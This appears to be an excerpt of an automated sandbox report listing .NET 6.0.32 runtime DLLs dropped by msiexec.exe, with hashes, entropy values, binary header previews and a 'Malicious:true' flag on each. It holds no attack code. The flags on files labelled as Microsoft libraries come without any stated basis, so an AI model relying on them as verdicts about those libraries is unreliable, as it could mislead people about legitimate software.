                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................." ..... ...................................................P......=.....`...@......@............... ...............................................&...(...@..........T...............................................................H............text...`........ .................. ..`.data...D....0......."..............@....reloc.......@.......$..............@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...h.(...C.o.m.m.e.n.t.s...S.y.s.t.e.m...R.u.n.t.i.m.e...C.o.m.p.i.l.e.r.S.e.r.v.i.c.e.s...V.i.s.u.a.l.C...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...x.(...F.i.l.e.D.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Extensions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):18184
                                                                                                                                                                                                                                        Entropy (8bit):6.6208527927079635
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:J5y7UByGe9xCEW60W8eNWUYA6VFHRN7B/7R9zb32:faUByGeY0FFClBF9z6
                                                                                                                                                                                                                                        MD5:BA4C37FBECE8728A70A1C5F21154BE54
                                                                                                                                                                                                                                        SHA1:2686CE405CA08FBD43660D80E4475BCCBBCC1D51
                                                                                                                                                                                                                                        SHA-256:58B0A3FF1CE0C24F66A2423883700E12CC92952EE14AD27050351739271225CC
                                                                                                                                                                                                                                        SHA-512:BD60A56C2A6E6D33BA3B103ED0C444781A8EC038CD47EA0F4EB65146E922F52F0EF7BAAF6DE33807A00A663F7ABAF495346C1C649A4FBEFBFD2575C527AFA5E4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:_..........."!..0..............3... ........@.. ...............................B....`.................................<3..O....@...................)...`.......2..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p3......H........ ......................P .......................................j.*....T....D...)Q.rrZ1...@....Q...f.6#XWm.o)..\..J}kJ^.t.c..ED|......)..w9|.}.b...6.._2...b...$..i...z........0..)..BSJB............v4.0.30319......`...$...#~......l...#Strings............#GUID...........#Blob......................3................................O...............Z.............m.........,.W.........5.............p.....p.....p.....p.....p...E.p...b.p...z.p.....p.................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Handles.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15520
                                                                                                                                                                                                                                        Entropy (8bit):6.812071918414655
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:4915xIWArmWJYA6VFHRN7DmOEBmo8R9zMLlt:s1ehFClDmlmoQ9z8t
                                                                                                                                                                                                                                        MD5:ECD54205E9F9C25C99C25583E31BF19E
                                                                                                                                                                                                                                        SHA1:CBFBC8186DDDE62ADBE8323A68354A04B2C5EDC4
                                                                                                                                                                                                                                        SHA-256:020BA76742ED8911E167343EE9D1BED08C4F3F21C8DDEE0A306D163FF6B58FA0
                                                                                                                                                                                                                                        SHA-512:F9C24AECB0439B8C1EDBBBF6A3E6E90F69DB2B01225D7CBB444F4E757C6625900F695057CCBDB4DEDA40C7B24BE879DFB61324A0B1D908DDAAD9418E40FD5D92
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..............."!..0..............)... ........@.. ...................................`.................................|)..O....@...................(...`.......(..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H........ ......................P ......................................L...i.8L.G...H.~..0*K`..d.V.......o.....Qr....P.........i$.Qb...;..<.....H..:..O....{N.w..!...Y`..8o.Q...-V:.E#.BCE .RBSJB............v4.0.30319......`.......#~..L.......#Strings....P.......#GUID...`.......#Blob......................3................................................(.x.....x...f.F.................'.........L...........a.......................H.....z.....|.x.................@.....

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.InteropServices.RuntimeInformation.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):31904
                                                                                                                                                                                                                                        Entropy (8bit):6.4408952831148465
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:NWHhUWxi5ciERQXIG6KMWFYpmGRuOWB/r1YA6VFHRN7ZE76R9zqgGcwH:gHpKMWFkmGsvBhFCli729z58
                                                                                                                                                                                                                                        MD5:7BC6DA57F4A287DE416B8DF0C1ECCF44
                                                                                                                                                                                                                                        SHA1:355DB90FE8B41076042315E3F8E967A3608DD2C6
                                                                                                                                                                                                                                        SHA-256:49314E6C92F60098842088CC69B2EA044F28EA571983191B6154F327302066E3
                                                                                                                                                                                                                                        SHA-512:C9B29F0DC2BE91D61EE4AEEDEB20F8C2526E0CED3A191E565AE118769101B83174AF091EDF9892FC10A39A199B6FC6B4A46A54E561BF24F76D74D23B0A699166
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....C..........." .....H..........................................................r.....`...@......@............... ......................................H........T...(...p..p.......T...............................................................H............text....F.......H.................. ..`.data........`.......J..............@....reloc..p....p.......R..............@..B............................................0...........................p.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.InteropServices.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):51872
                                                                                                                                                                                                                                        Entropy (8bit):6.472004749878635
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:C5oK6fKfIPMWW/z2rg8Z61rvZqhwFLUFMjVYuPkKFClZts89zCVi:C5oWfIP8z2r1GqhwFIFMjVPPkmibzB
                                                                                                                                                                                                                                        MD5:268A59245835DBFBFD3C23BF744D39D5
                                                                                                                                                                                                                                        SHA1:55874A6B8EEC97204791FE1DCB081E85E50CA1C0
                                                                                                                                                                                                                                        SHA-256:0CD3306A5380E59B1C61B16461DD8A0A76E58D677E7DA1EC3741BB64EFA25AAA
                                                                                                                                                                                                                                        SHA-512:6929A0F97B645AE062F6FDE1F8593AA3AA4E89F14BC9A253718615477FE79D5DE60AECFE4C33B32B0579719AC2AC241A5B243D3CA0063ACB1CDEB984C858756A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d... @............" ......................................................................`...@......@............... ....................................... ..P........(..............T...............................................................H............text............................... ..`.data...............................@....reloc..............................@..B............................................0...........................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...V.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...R.u.n.t.i.m.e...I.n.t.e.r.o.p.S.e.r.v.i.c.e.s.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...f.....F.i.l.e.D.e.s.c.r.i.p.t.i.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Intrinsics.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16656
                                                                                                                                                                                                                                        Entropy (8bit):6.679809972102448
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:G1d+WmkLW/YA6VFHRN7IUmRxB+R9zrPGkq21:4EFClIUmRxw9zb/1
                                                                                                                                                                                                                                        MD5:115B64552BE0B3A33E0645EB04D78D65
                                                                                                                                                                                                                                        SHA1:A7EE75D3913B34AEE6516DCA723FF5A0BDD46B78
                                                                                                                                                                                                                                        SHA-256:9FA85D63880EB178AC4D425F54E3A25A2E863EBF8DF62ABDA3333AD711B1ADAD
                                                                                                                                                                                                                                        SHA-512:93D02C37FA25936EC59F3EC1905BB071576044AC4347233833E7D692EF8FF5C6110B836EE92E5EC59BAFB8CC291185DCF694DA3C0493010A85B2993D55B39E3B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....#..........."!..0..............-... ........@.. ..............................j{....`.................................d-..W....@...................)...`.......,..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H........ ......................P ............................................k"..%.oX...a....J..u...........Y..<..W@.t......,..b.#WO.!.......#m..:..0K.4....*&6.."v.."...n...C...A.b+0K.#..gBSJB............v4.0.30319......`.......#~..<.......#Strings....$.......#GUID...4.......#Blob......................3................................9.............................p.........?.....g...................1.....1...}.1...4.1.....1...X.1...u.1.....1...(.1...O.............

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Loader.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16144
                                                                                                                                                                                                                                        Entropy (8bit):6.728895977359552
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:v0SQa4xxo6VW5bGWavpWjA6Kr4PFHnhWgN7agWM4DyH8RwX01k9z3A1Zx+XL7DnK:zQ36wW5bGWuYA6VFHRN7d9R9zmwjK
                                                                                                                                                                                                                                        MD5:B7D249F4C68AD5B4714FEB092732FFF4
                                                                                                                                                                                                                                        SHA1:B01157C38E9F36D0906ABA7292E546DAFC1059D5
                                                                                                                                                                                                                                        SHA-256:C58ED48A3B29E49D9DBF47338192E91F2CE16870973F6C20B316BA7747738497
                                                                                                                                                                                                                                        SHA-512:45FDA399159E5E7F0121A4672F36D3CA9B9CA24D66E810B0838C6D5BF331B8AC73905EBABE756F850E4E38BF96EF09ED0A0F08183067EF708447E0A136E61E31
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."!..0..............*... ........@.. ..............................f.....`.................................8*..S....@...................)...`.......)..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p*......H........ ......................P ...............................................9j'6^.)...]..z......EC....M..}.-.A....`.....L.i..1.o........7..{...k...0N.<<...[Y..?..#....dB<..Nk.l.....\..3.\r-BSJB............v4.0.30319......`... ...#~..........#Strings............#GUID...........#Blob......................3..................................................,...4.,...p.....L.......R.........t.....l.....V.....V.................................................,...........

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Numerics.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):221960
                                                                                                                                                                                                                                        Entropy (8bit):6.873049679860797
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:YjBg53qIzkOGjMD1jUZVEJrSlLXuDcWroW6p:8BgxqIz1GgDRKVEJO5uDcWji
                                                                                                                                                                                                                                        MD5:83067009F7425B98D4BDF066B6124469
                                                                                                                                                                                                                                        SHA1:DCBDD19E21C0734BAB3804908585C96F06E06CE3
                                                                                                                                                                                                                                        SHA-256:E3EFC3989359B0B0F66D1BED6B390F47B086E854FA1C96269244B353986A23BC
                                                                                                                                                                                                                                        SHA-512:B4CE3EF0C9E5B1288AA3BB159769C557B2409C34FA7250FA0FAB54A0C310031D834C6F948FF7DA4D27381AD9259E5E4285F414525CADAC64ECE080AAE88474CF
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....0i..........." ......... ...............................................`...........`...@......@............... .......................................T..x....:...)...P......P...T...............................................................H............text...1........................... ..`.data...P....0......................@....reloc.......P.......6..............@..B............................................0...........................<.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o...x.....0.0.0.0.0.4.b.0...H.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...R.u.n.t.i.m.e...N.u.m.e.r.i.c.s...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...X.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Serialization.Formatters.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):322840
                                                                                                                                                                                                                                        Entropy (8bit):6.6930952327752244
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:J2BNIzFraZFu5UJgNFmZzq5tqdKfB8wLyHfHwO/S14CFYgbj:eupaYUJgNFmZc+L/HwOsdD3
                                                                                                                                                                                                                                        MD5:118E45018A071C186DAB988B8DBB197F
                                                                                                                                                                                                                                        SHA1:9941E8744E34A5C932A1C76EB8AE8B1E7ABB3513
                                                                                                                                                                                                                                        SHA-256:3C9BAEE2E1D99E4145E3A3B26F9F53F7D1665239502AA16EC54F3666CDF0F84B
                                                                                                                                                                                                                                        SHA-512:A09C4219A56AEC62B00715E0DBBDBC899C089DBA1A834DDBBC5331B2840F24FE2A67B0714852D7F40248FC3C34928956AA3445B7A9B3CC752A54BD82648E9E3D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..............." .....p...R............................................................`...@......@............... .......................................o...........)......(....&..T...............................................................H............text....n.......p.................. ..`.data....I.......J...r..............@....reloc..(...........................@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...h.(...C.o.m.m.e.n.t.s...S.y.s.t.e.m...R.u.n.t.i.m.e...S.e.r.i.a.l.i.z.a.t.i.o.n...F.o.r.m.a.t.t.e.r.s...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...x.(...F.i.l.e.D.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Serialization.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16032
                                                                                                                                                                                                                                        Entropy (8bit):6.714776898123936
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:QHqvyVWbumdB5W6fYA6VFHRN7pHR9z775md:AMyWXdBDFClj9zv5md
                                                                                                                                                                                                                                        MD5:1C18ECDFAFDCB5BE7926AC0444104990
                                                                                                                                                                                                                                        SHA1:77F654018ABC84CB8212E8D32BCC44A50C965BA2
                                                                                                                                                                                                                                        SHA-256:1A063D6F812489C64273AFC760B06C04E04BE1C140E7B196A0946D0D0175C8F2
                                                                                                                                                                                                                                        SHA-512:5AB501B82128514F718DB64796AE701CC612B7FAE62C0427EFCDD29869FF2A7DE6D257254CA785278EC459FD340DB770A14FE87E28B8C67409A95C0296DC7DE7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....]..........."!..0.............~*... ........@.. ....................................`.................................,*..O....@...................(...`......h)..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`*......H........ ......................P ......................................LJ.v.8't.Q.|Y.u.....?...R$.Y....V.y..#c.k...r../....%{%c.N..]$..=w....C.O..^|.&..u..&..l...... M..`....'|...e.h?..TR....\..BSJB............v4.0.30319......`.......#~..|...d...#Strings............#GUID...........#Blob......................3............................................................3...........^.....a.......O.....O...w.O.....O.....O...w.O.....O.....O...G.O...I.........................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Serialization.Primitives.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):28832
                                                                                                                                                                                                                                        Entropy (8bit):6.457861200692383
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:jHWFI0JBrWtmtrwhpKH0sdbnMbKF+87makO2akSMHHDGEHsfbEbIYA6VFHRN7hBC:jqDJB+mtrewOW+8dxr1FCl7moQ9zV
                                                                                                                                                                                                                                        MD5:288B58AF49B3F25FE4BDDD61A7D87249
                                                                                                                                                                                                                                        SHA1:2CC6789B40BE3ADC7C48C22A469B03294909ED1B
                                                                                                                                                                                                                                        SHA-256:52E0F82696E628D652B2A88D3B82281B48729FAE5DDF171DC8A564B3C7C4402E
                                                                                                                                                                                                                                        SHA-512:8B8A7BC267A7CD5A4F65AE0951139B886C472E374769E2367CC47B658035C734BA73254D148EEB51FD8520F73708A77C3CC7A446CC2FD4944AB74B015383FF7C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...!E!..........." .....@...................................................p......s.....`...@......@............... ...............................................H...(...`..(.......T...............................................................H............text....>.......@.................. ..`.data........P.......B..............@....reloc..(....`.......F..............@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...h.(...C.o.m.m.e.n.t.s...S.y.s.t.e.m...R.u.n.t.i.m.e...S.e.r.i.a.l.i.z.a.t.i.o.n...P.r.i.m.i.t.i.v.e.s...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...x.(...F.i.l.e.D.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Serialization.Xml.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16544
                                                                                                                                                                                                                                        Entropy (8bit):6.7468972537613645
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:0YklmI8NQv4RMWsBdBBgWsYA6VFHRN7PtHNsAR9z/rV:TklmI8NQwRibBBiFClFts89zzV
                                                                                                                                                                                                                                        MD5:BA0279DD1B0B0EB313A8BB8E55F06B3D
                                                                                                                                                                                                                                        SHA1:A15B141F593ED49233423080E257888DEAEA2538
                                                                                                                                                                                                                                        SHA-256:6DDE7015FCCB3AA24D6ADA31AD6796688205902195CE2CFB17360FD08A7B9204
                                                                                                                                                                                                                                        SHA-512:B76E0511DCA2BC0AF8F4A0C3DF6673DC6A2F932065AEA157219A55442F3D5606A633D77DEEB931741E3750CA8B24D6FD261A34D4A2A46CAD7E16470100DA107B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."!..0..............-... ........@.. ..............................5.....`.................................p-..K....@...................(...`.......,..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H........ ......................P ......................................$..s..*./~?$.r.0L.....|.Q^x...z..%W$~..ZT..(.\.. X.A;...ZoW...*(....s..W.V.-.i.../.t...().....D3S.7...h........9..H....'r..QBSJB............v4.0.30319......`...d...#~......d...#Strings....(.......#GUID...8.......#Blob......................3..................................................f.....f...W.;.................Q.........=...........R.......................9.....k.....m.f.......................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Serialization.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17568
                                                                                                                                                                                                                                        Entropy (8bit):6.623513768064609
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:P6EvDj8NdwiLWgM54BHWFYA6VFHRN7oZBmo8R9zMLp:P6EvDj8NeiP24BuFClWmoQ9z6
                                                                                                                                                                                                                                        MD5:31BAEBC3E399093FB5925DB986172010
                                                                                                                                                                                                                                        SHA1:7ED9BB1471103CA17C5C5E4967D9EB09CC71B6E3
                                                                                                                                                                                                                                        SHA-256:6CD19434D4C97B20ACEC04EB372D08480072D16EB73EAB23D181854A8E789F3E
                                                                                                                                                                                                                                        SHA-512:232C4210C8C568346A2B342AC28EBEE631B5185CD8F2BF24F347EDBA02046F53887A0F9D4CDB89E6EC4B34C1E9FB65437E24728395B8A1F4E174359751D73CC6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p............." ..0..............0... ...@....... ..............................%.....`..................................0..O....@...................(...`......./..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................0......H.......P ......................./......................................BSJB............v4.0.30319......l...|...#~..........#Strings............#US.........#GUID...........#Blob............T.........3....................................,.....................f.......t...............7.......t...=.t...M.t.....t...B.t.....t.....t.....t.....t...e.w...&.w...r.........................T.....T.....T...).T...1.T...9.T...A.T...I.T...Q.T...Y.T...a.T...i.T...q.T...y.T.....T. ...T.....T...

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):42656
                                                                                                                                                                                                                                        Entropy (8bit):5.805080563655079
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:wBV0jdpFKYl5f4bGRi2xVbcVT4pEQPFClV629zR:MedGYl5f4bGR3G0mQ9ioCzR
                                                                                                                                                                                                                                        MD5:3C99EB88F752B9D377C96ABE31B7CC06
                                                                                                                                                                                                                                        SHA1:3B7BB82E17FACDBFF666243E57D3B19B2565D09E
                                                                                                                                                                                                                                        SHA-256:787FF92525E6F78436E27C144BF888EE9714F07BF0ADD7EB8BFE1F7326E31810
                                                                                                                                                                                                                                        SHA-512:07B15FE4A1576E5346FB05F69276A11F9F94F9CD9131A25F8062631C276765C8445912025B9C633B81E5D4544261A8B5B664B87A679E6613CC91C4E21A6917DC
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...HEb..........."!..0..t..........^.... ........@.. ..............................D.....`.....................................W.......X............~...(..........d...8............................................ ............... ..H............text...dr... ...t.................. ..`.rsrc...X............v..............@..@.reloc...............|..............@..B................@.......H........ ...p..................P ........................................d.....;......M.......i.iT..m{.\..u;B......(.\.....:......(m..:..d*^........^K.gY..t.wy.:..]....3..*..2...3..,........8.BSJB............v4.0.30319......`...l0..#~...0...=..#Strings.....m......#GUID....m......#Blob......................3................................T...............'.[3..".[3.....2...3....e.....>.. ....<3....<3....j!....j!....j!....j!....j!..q.j!....j!....j!..R.j!..&.[3..........

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.AccessControl.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):215320
                                                                                                                                                                                                                                        Entropy (8bit):6.694713736900479
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:2GFAFB57nGa7V/aDGB0krnx7lZnFW2iBeVICTiupU8TVUnVZ5PDMXZo1cQtSckOi:A7GaRaiBv7lZoeXZ/MI1
                                                                                                                                                                                                                                        MD5:1CD883D7FC4B80840F269602EBE7EC72
                                                                                                                                                                                                                                        SHA1:7301B341569A5FB6085795EC5DC016B5CB93ACDB
                                                                                                                                                                                                                                        SHA-256:91D7D0C8DE0D1B387200906EEF67D528BBCB8EC0D9726F292B6EBFDDA71E95DC
                                                                                                                                                                                                                                        SHA-512:9CF35D3E26F254180658F42C2BBDCB7EBDDF9B736F1F17C60C9A83912D477A9604C954C288303CD865E34C53D6B641EBFE90A9AEE4723E2D64C52614B12653D6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
